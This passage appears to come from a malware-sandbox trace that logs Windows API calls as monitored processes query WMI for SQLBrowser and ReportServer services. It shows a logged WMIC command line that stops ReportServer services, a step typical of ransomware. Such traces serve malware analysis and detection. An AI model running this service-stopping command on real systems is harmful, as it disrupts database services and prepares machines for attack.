lFlags=0, ppInSignature=0xcf860, ppOutSignature=0xcf878 | out: ppInSignature=0xcf860*=0x0, ppOutSignature=0xcf878*=0x1e4c530) returned 0x0 [0244.195] free (_Block=0x45cca0) [0244.195] IUnknown:Release (This=0x1e4c530) returned 0x0 [0244.195] IUnknown:Release (This=0x1e4c030) returned 0x0 [0244.195] ??0CHString@@QEAA@XZ () returned 0xcf680 [0244.195] GetCurrentThreadId () returned 0x36c [0244.195] malloc (_Size=0x18) returned 0x45cca0 [0244.195] lstrlenA (lpString="") returned 0 [0244.195] malloc (_Size=0x2) returned 0x456a60 [0244.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f314c, cbMultiByte=-1, lpWideCharStr=0x456a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0244.195] free (_Block=0x456a60) [0244.195] malloc (_Size=0x18) returned 0x45cce0 [0244.195] lstrlenA (lpString="") returned 0 [0244.195] malloc (_Size=0x2) returned 0x456a60 [0244.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f314c, cbMultiByte=-1, lpWideCharStr=0x456a60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0244.196] free (_Block=0x456a60) [0244.196] malloc (_Size=0x18) returned 0x45cd00 [0244.196] free (_Block=0x45cce0) [0244.196] malloc (_Size=0x18) returned 0x45cce0 [0244.196] lstrlenA (lpString="SELECT * FROM ") returned 14 [0244.196] malloc (_Size=0x1e) returned 0x45cf80 [0244.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f4a40, cbMultiByte=-1, lpWideCharStr=0x45cf80, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0244.196] free (_Block=0x45cf80) [0244.196] malloc (_Size=0x18) returned 0x45d5a0 [0244.196] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0244.196] SysStringLen (param_1="Win32_Service") returned 0xd [0244.196] free (_Block=0x45cce0) [0244.196] malloc (_Size=0x18) returned 0x45cce0 [0244.196] malloc (_Size=0x18) returned 0x45d5c0 [0244.196] lstrlenA (lpString=" WHERE ") returned 7 [0244.196] malloc (_Size=0x10) returned 0x45d5e0 [0244.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8f3e20, cbMultiByte=-1, lpWideCharStr=0x45d5e0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0244.196] free (_Block=0x45d5e0) [0244.196] malloc (_Size=0x18) returned 0x45d5e0 [0244.197] SysStringLen (param_1=" WHERE ") returned 0x7 [0244.197] SysStringLen (param_1="name like '%%SQLBrowser%%'") returned 0x1a [0244.197] malloc (_Size=0x18) returned 0x45d600 [0244.197] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0244.197] SysStringLen (param_1=" WHERE name like '%%SQLBrowser%%'") returned 0x21 [0244.197] free (_Block=0x45d5a0) [0244.197] free (_Block=0x45d5e0) [0244.197] free (_Block=0x45d5c0) [0244.197] free (_Block=0x45cce0) [0244.197] malloc (_Size=0x18) returned 0x45cce0 [0244.197] IWbemServices:ExecQuery (in: This=0x1e23b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLBrowser%%'", lFlags=48, pCtx=0x0, ppEnum=0xcf668 | out: ppEnum=0xcf668*=0x1e23c28) returned 0x0 [0244.203] free (_Block=0x45cce0) [0244.203] CoSetProxyBlanket (pProxy=0x1e23c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0244.206] IEnumWbemClassObject:Next (in: This=0x1e23c28, lTimeout=-1, uCount=0x1, apObjects=0xcf670, puReturned=0xcf7f8 | out: apObjects=0xcf670*=0x0, puReturned=0xcf7f8*=0x0) returned 0x1 [0244.689] IUnknown:Release (This=0x1e23c28) returned 0x0 [0244.692] free (_Block=0x45d600) [0244.692] free (_Block=0x45cd00) [0244.692] free (_Block=0x45cca0) [0244.692] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.692] free (_Block=0x45ccc0) [0244.692] free (_Block=0x45d240) [0244.692] free (_Block=0x45d1c0) [0244.692] free (_Block=0x45d140) [0244.692] free (_Block=0x45d0e0) [0244.692] free (_Block=0x45d080) [0244.692] free (_Block=0x45d310) [0244.692] free (_Block=0x45d290) [0244.692] free (_Block=0x45d000) [0244.692] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.692] GetCurrentThreadId () returned 0x36c [0244.692] ??0CHString@@QEAA@PEBG@Z () returned 0xcfb88 [0244.692] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xcfb88 [0244.693] malloc (_Size=0x800) returned 0x45dd70 [0244.693] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x45dd70, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0244.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0244.693] malloc (_Size=0x1c) returned 0x45cf80 [0244.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x45cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0244.693] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0244.693] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0244.693] free (_Block=0x45cf80) [0244.693] free (_Block=0x45dd70) [0244.694] ??1CHString@@QEAA@XZ () returned 0x49733d01 [0244.694] WbemLocator:IUnknown:Release (This=0x1e23b28) returned 0x0 [0244.694] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0244.694] _kbhit () returned 0x0 [0244.695] free (_Block=0x45cf60) [0244.695] free (_Block=0x45cb00) [0244.696] free (_Block=0x45cae0) [0244.696] free (_Block=0x45cac0) [0244.696] free (_Block=0x45caa0) [0244.696] free (_Block=0x45cdc0) [0244.696] free (_Block=0x457150) [0244.696] free (_Block=0x45cf00) [0244.696] free (_Block=0x458640) [0244.696] free (_Block=0x45cba0) [0244.696] free (_Block=0x45cbc0) [0244.696] free (_Block=0x456eb0) [0244.696] free (_Block=0x45d520) [0244.696] free (_Block=0x45cbe0) [0244.696] free (_Block=0x45cc40) [0244.696] free (_Block=0x45d4a0) [0244.696] free (_Block=0x45d420) [0244.696] free (_Block=0x45cc20) [0244.696] free (_Block=0x45cc00) [0244.697] free (_Block=0x45cc60) [0244.697] free (_Block=0x45d3c0) [0244.697] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0244.697] free (_Block=0x45ce60) [0244.697] free (_Block=0x45cb40) [0244.697] free (_Block=0x45cf30) [0244.697] free (_Block=0x45cb80) [0244.697] free (_Block=0x45cfb0) [0244.697] free (_Block=0x45cb60) [0244.697] free (_Block=0x45cb20) [0244.697] free (_Block=0x457f80) [0244.697] free (_Block=0x456990) [0244.697] free (_Block=0x4569e0) [0244.697] free (_Block=0x45cc80) [0244.697] free (_Block=0x456ad0) [0244.697] free (_Block=0x456e90) [0244.697] free (_Block=0x458040) [0244.697] free (_Block=0x456e70) [0244.697] free (_Block=0x458000) [0244.697] free (_Block=0x456e10) [0244.697] free (_Block=0x456e30) [0244.697] free (_Block=0x456cf0) [0244.697] free (_Block=0x456d10) [0244.697] free (_Block=0x456c90) [0244.698] free (_Block=0x456cb0) [0244.698] free (_Block=0x456d50) [0244.698] free (_Block=0x456d70) [0244.698] free (_Block=0x456db0) [0244.698] free (_Block=0x456dd0) [0244.698] free (_Block=0x456bd0) [0244.698] free (_Block=0x456bf0) [0244.698] free (_Block=0x456b70) [0244.698] free (_Block=0x456b90) [0244.698] free (_Block=0x456c30) [0244.698] free (_Block=0x456c50) [0244.698] free (_Block=0x456b10) [0244.698] free (_Block=0x456b30) [0244.698] free (_Block=0x456a80) [0244.698] free (_Block=0x456a30) [0244.698] free (_Block=0x45cd30) [0244.698] WbemLocator:IUnknown:Release (This=0x1e11390) returned 0x2 [0244.698] WbemLocator:IUnknown:Release (This=0x1e23a98) returned 0x0 [0244.699] WbemLocator:IUnknown:Release (This=0x1e11390) returned 0x1 [0244.699] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0244.699] WbemLocator:IUnknown:Release (This=0x1e11390) returned 0x0 [0244.699] free (_Block=0x45ca20) [0244.699] free (_Block=0x45ca40) [0244.699] free (_Block=0x458540) [0244.699] free (_Block=0x45ca60) [0244.699] free (_Block=0x45ca80) [0244.699] free (_Block=0x458580) [0244.699] free (_Block=0x45c8a0) [0244.699] free (_Block=0x45c8c0) [0244.699] free (_Block=0x4583c0) [0244.699] free (_Block=0x45c8e0) [0244.700] free (_Block=0x45c900) [0244.700] free (_Block=0x458400) [0244.700] free (_Block=0x45c820) [0244.700] free (_Block=0x45c840) [0244.700] free (_Block=0x458340) [0244.700] free (_Block=0x45c860) [0244.700] free (_Block=0x45c880) [0244.700] free (_Block=0x458380) [0244.700] free (_Block=0x45c9a0) [0244.700] free (_Block=0x45c9c0) [0244.700] free (_Block=0x4584c0) [0244.700] free (_Block=0x45c9e0) [0244.700] free (_Block=0x45ca00) [0244.700] free (_Block=0x458500) [0244.700] free (_Block=0x45c7a0) [0244.700] free (_Block=0x45c7c0) [0244.700] free (_Block=0x4582c0) [0244.701] free (_Block=0x45c7e0) [0244.701] free (_Block=0x45c800) [0244.701] free (_Block=0x458300) [0244.701] free (_Block=0x45c920) [0244.701] free (_Block=0x45c940) [0244.701] free (_Block=0x458440) [0244.701] free (_Block=0x45c960) [0244.701] free (_Block=0x45c980) [0244.701] free (_Block=0x458480) [0244.701] free (_Block=0x45c6e0) [0244.701] free (_Block=0x45c700) [0244.701] free (_Block=0x458200) [0244.701] free (_Block=0x45c5a0) [0244.701] free (_Block=0x45c5c0) [0244.701] free (_Block=0x4580c0) [0244.701] free (_Block=0x45c560) [0244.701] free (_Block=0x45c580) [0244.701] free (_Block=0x458080) [0244.702] free (_Block=0x45c620) [0244.702] free (_Block=0x45c640) [0244.702] free (_Block=0x458140) [0244.702] free (_Block=0x45c720) [0244.702] free (_Block=0x45c740) [0244.702] free (_Block=0x458240) [0244.702] free (_Block=0x45c5e0) [0244.702] free (_Block=0x45c600) [0244.702] free (_Block=0x458100) [0244.702] free (_Block=0x45c660) [0244.702] free (_Block=0x45c680) [0244.702] free (_Block=0x458180) [0244.702] free (_Block=0x45c6a0) [0244.702] free (_Block=0x45c6c0) [0244.702] free (_Block=0x4581c0) [0244.702] free (_Block=0x45c760) [0244.702] free (_Block=0x45c780) [0244.702] free (_Block=0x458280) [0244.703] CoUninitialize () [0244.784] exit (_Code=0) [0244.784] free (_Block=0x456f00) [0244.784] free (_Block=0x457f40) [0244.784] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.784] free (_Block=0x456ff0) [0244.784] free (_Block=0x456af0) [0244.784] free (_Block=0x457f00) [0244.784] free (_Block=0x457ec0) [0244.784] free (_Block=0x457e70) [0244.784] free (_Block=0x457e30) [0244.784] free (_Block=0x455ac0) [0244.784] free (_Block=0x457db0) [0244.784] free (_Block=0x455a80) [0244.784] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0244.784] free (_Block=0x4585c0) Thread: id = 154 os_tid = 0xafc Thread: id = 155 os_tid = 0xa48 Thread: id = 156 os_tid = 0x72c Thread: id = 157 os_tid = 0x4a0 Thread: id = 158 os_tid = 0x748 Process: id = "18" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x16220000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 160 os_tid = 0x730 [0244.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af950 | out: lpSystemTimeAsFileTime=0x1af950*(dwLowDateTime=0xa7b9fb50, dwHighDateTime=0x1d61d49)) [0244.969] GetCurrentProcessId () returned 0xa88 [0244.969] GetCurrentThreadId () returned 0x730 [0244.969] GetTickCount () returned 0x116708f [0244.969] QueryPerformanceCounter (in: lpPerformanceCount=0x1af958 | out: lpPerformanceCount=0x1af958*=36514244751) returned 1 [0244.973] GetModuleHandleW (lpModuleName=0x0) returned 0xff430000 [0244.973] __set_app_type (_Type=0x1) [0244.973] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff47ced0) returned 0x0 [0244.973] __wgetmainargs (in: _Argc=0xff4a2380, _Argv=0xff4a2390, _Env=0xff4a2388, _DoWildCard=0, _StartInfo=0xff4a239c | out: _Argc=0xff4a2380, _Argv=0xff4a2390, _Env=0xff4a2388) returned 0 [0244.974] ??0CHString@@QEAA@XZ () returned 0xff4a2ab0 [0244.974] malloc (_Size=0x30) returned 0xe5a80 [0244.974] malloc (_Size=0x70) returned 0xe7dc0 [0244.974] malloc (_Size=0x50) returned 0xe5ac0 [0244.974] malloc (_Size=0x30) returned 0xe7e40 [0244.974] malloc (_Size=0x48) returned 0xe7e80 [0244.974] malloc (_Size=0x30) returned 0xe7ed0 [0244.975] malloc (_Size=0x30) returned 0xe7f10 [0244.975] ??0CHString@@QEAA@XZ () returned 0xff4a2f58 [0244.975] malloc (_Size=0x30) returned 0xe7f50 [0244.975] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0244.975] SetConsoleCtrlHandler (HandlerRoutine=0xff475724, Add=1) returned 1 [0244.975] _onexit (_Func=0xff48f378) returned 0xff48f378 [0244.975] _onexit (_Func=0xff48f490) returned 0xff48f490 [0244.975] _onexit (_Func=0xff48f4d0) returned 0xff48f4d0 [0244.975] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0244.975] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0244.980] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0244.991] CoCreateInstance (in: rclsid=0xff4373a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff437370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff4a2940 | out: ppv=0xff4a2940*=0x1dc1390) returned 0x0 [0245.003] GetCurrentProcess () returned 0xffffffffffffffff [0245.003] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af720 | out: TokenHandle=0x1af720*=0xf4) returned 1 [0245.003] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af718 | out: TokenInformation=0x0, ReturnLength=0x1af718) returned 0 [0245.003] malloc (_Size=0x118) returned 0xe69a0 [0245.003] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0xe69a0, TokenInformationLength=0x118, ReturnLength=0x1af718 | out: TokenInformation=0xe69a0, ReturnLength=0x1af718) returned 1 [0245.003] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0xe69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=666829215, Attributes=0x41ad), (Luid.LowPart=0x0, Luid.HighPart=950160, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0245.003] free (_Block=0xe69a0) [0245.003] CloseHandle (hObject=0xf4) returned 1 [0245.003] malloc (_Size=0x40) returned 0xe69a0 [0245.003] malloc (_Size=0x40) returned 0xe69f0 [0245.003] malloc (_Size=0x40) returned 0xe6a40 [0245.003] malloc (_Size=0x20a) returned 0xe6a90 [0245.003] GetSystemDirectoryW (in: lpBuffer=0xe6a90, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.003] free (_Block=0xe6a90) [0245.003] malloc (_Size=0x18) returned 0xe7f90 [0245.003] malloc (_Size=0x18) returned 0xe7fb0 [0245.004] malloc (_Size=0x18) returned 0xe6a90 [0245.004] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0245.004] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0245.004] free (_Block=0xe7f90) [0245.004] free (_Block=0xe7fb0) [0245.004] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0245.004] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0245.004] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0245.004] FreeLibrary (hLibModule=0x77940000) returned 1 [0245.005] free (_Block=0xe6a90) [0245.005] _vsnwprintf (in: _Buffer=0xe6a40, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1af348 | out: _Buffer="ms_409") returned 6 [0245.005] malloc (_Size=0x20) returned 0xe7f90 [0245.005] GetComputerNameW (in: lpBuffer=0xe7f90, nSize=0x1af720 | out: lpBuffer="XDUWTFONO", nSize=0x1af720) returned 1 [0245.005] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.005] malloc (_Size=0x14) returned 0xe6a90 [0245.005] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.005] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1af718 | out: lpNameBuffer=0x0, nSize=0x1af718) returned 0x7fffffdd000 [0245.006] GetLastError () returned 0xea [0245.006] malloc (_Size=0x40) returned 0xe6ab0 [0245.006] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xe6ab0, nSize=0x1af718 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1af718) returned 0x1 [0245.007] lstrlenW (lpString="") returned 0 [0245.007] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.007] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0245.009] lstrlenW (lpString=".") returned 1 [0245.009] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0245.009] lstrlenW (lpString="LOCALHOST") returned 9 [0245.009] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0245.010] free (_Block=0xe6a90) [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] malloc (_Size=0x14) returned 0xe6a90 [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] malloc (_Size=0x14) returned 0xe6b00 [0245.010] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.010] malloc (_Size=0x8) returned 0xe6b20 [0245.010] malloc (_Size=0x18) returned 0xe6b40 [0245.010] malloc (_Size=0x30) returned 0xe6b60 [0245.010] malloc (_Size=0x18) returned 0xe6ba0 [0245.010] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.010] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.010] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.010] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.010] malloc (_Size=0x30) returned 0xe6bc0 [0245.010] malloc (_Size=0x18) returned 0xe6c00 [0245.010] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.010] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.010] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.010] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.011] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.011] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.011] malloc (_Size=0x30) returned 0xe6c20 [0245.011] malloc (_Size=0x18) returned 0xe6c60 [0245.011] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.011] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.011] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.011] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.011] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.011] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.011] malloc (_Size=0x30) returned 0xe6c80 [0245.011] malloc (_Size=0x18) returned 0xe6cc0 [0245.011] malloc (_Size=0x30) returned 0xe6ce0 [0245.011] malloc (_Size=0x18) returned 0xe6d20 [0245.011] SysStringLen (param_1="NONE") returned 0x4 [0245.011] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.011] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.011] SysStringLen (param_1="NONE") returned 0x4 [0245.011] malloc (_Size=0x30) returned 0xe6d40 [0245.011] malloc (_Size=0x18) returned 0xe6d80 [0245.011] SysStringLen (param_1="CONNECT") returned 0x7 [0245.011] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.011] malloc (_Size=0x30) returned 0xe6da0 [0245.011] malloc (_Size=0x18) returned 0xe6de0 [0245.012] SysStringLen (param_1="CALL") returned 0x4 [0245.012] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.012] SysStringLen (param_1="CALL") returned 0x4 [0245.012] SysStringLen (param_1="CONNECT") returned 0x7 [0245.012] malloc (_Size=0x30) returned 0xe6e00 [0245.012] malloc (_Size=0x18) returned 0xe6e40 [0245.012] SysStringLen (param_1="PKT") returned 0x3 [0245.012] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.012] SysStringLen (param_1="PKT") returned 0x3 [0245.012] SysStringLen (param_1="NONE") returned 0x4 [0245.012] SysStringLen (param_1="NONE") returned 0x4 [0245.012] SysStringLen (param_1="PKT") returned 0x3 [0245.012] malloc (_Size=0x30) returned 0xe6e60 [0245.012] malloc (_Size=0x18) returned 0xe6ea0 [0245.012] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.012] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.012] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.012] SysStringLen (param_1="NONE") returned 0x4 [0245.012] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.012] SysStringLen (param_1="PKT") returned 0x3 [0245.012] SysStringLen (param_1="PKT") returned 0x3 [0245.012] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.012] malloc (_Size=0x30) returned 0xe8000 [0245.013] malloc (_Size=0x18) returned 0xe6ec0 [0245.013] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.013] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.013] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.013] SysStringLen (param_1="PKT") returned 0x3 [0245.013] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.013] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.013] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.013] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.013] malloc (_Size=0x30) returned 0xe8040 [0245.013] malloc (_Size=0x40) returned 0xe6ee0 [0245.014] malloc (_Size=0x20a) returned 0xe6f30 [0245.014] GetSystemDirectoryW (in: lpBuffer=0xe6f30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.014] free (_Block=0xe6f30) [0245.014] malloc (_Size=0x18) returned 0xe6f30 [0245.014] malloc (_Size=0x18) returned 0xe6f50 [0245.014] malloc (_Size=0x18) returned 0xe6f70 [0245.014] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0245.014] SysStringLen (param_1="\\wbem\\") returned 0x6 [0245.014] free (_Block=0xe6f30) [0245.014] free (_Block=0xe6f50) [0245.014] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0245.014] free (_Block=0xe6f70) [0245.014] malloc (_Size=0x18) returned 0xe6f30 [0245.014] malloc (_Size=0x18) returned 0xe6f50 [0245.014] malloc (_Size=0x18) returned 0xe6f70 [0245.014] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0245.014] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0245.015] free (_Block=0xe6f30) [0245.015] free (_Block=0xe6f50) [0245.015] GetCurrentThreadId () returned 0x730 [0245.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1af020 | out: phkResult=0x1af020*=0xf8) returned 0x0 [0245.015] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1af070, lpcbData=0x1af010*=0x400 | out: lpType=0x0, lpData=0x1af070*=0x30, lpcbData=0x1af010*=0x4) returned 0x0 [0245.015] _wcsicmp (_String1="0", _String2="1") returned -1 [0245.015] _wcsicmp (_String1="0", _String2="2") returned -2 [0245.015] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1af010*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1af010*=0x42) returned 0x0 [0245.015] malloc (_Size=0x86) returned 0xe6f90 [0245.015] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xe6f90, lpcbData=0x1af010*=0x42 | out: lpType=0x0, lpData=0xe6f90*=0x25, lpcbData=0x1af010*=0x42) returned 0x0 [0245.015] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0245.015] malloc (_Size=0x42) returned 0xe7020 [0245.015] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0245.015] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1af070, lpcbData=0x1af010*=0x400 | out: lpType=0x0, lpData=0x1af070*=0x36, lpcbData=0x1af010*=0xc) returned 0x0 [0245.015] _wtol (_String="65536") returned 65536 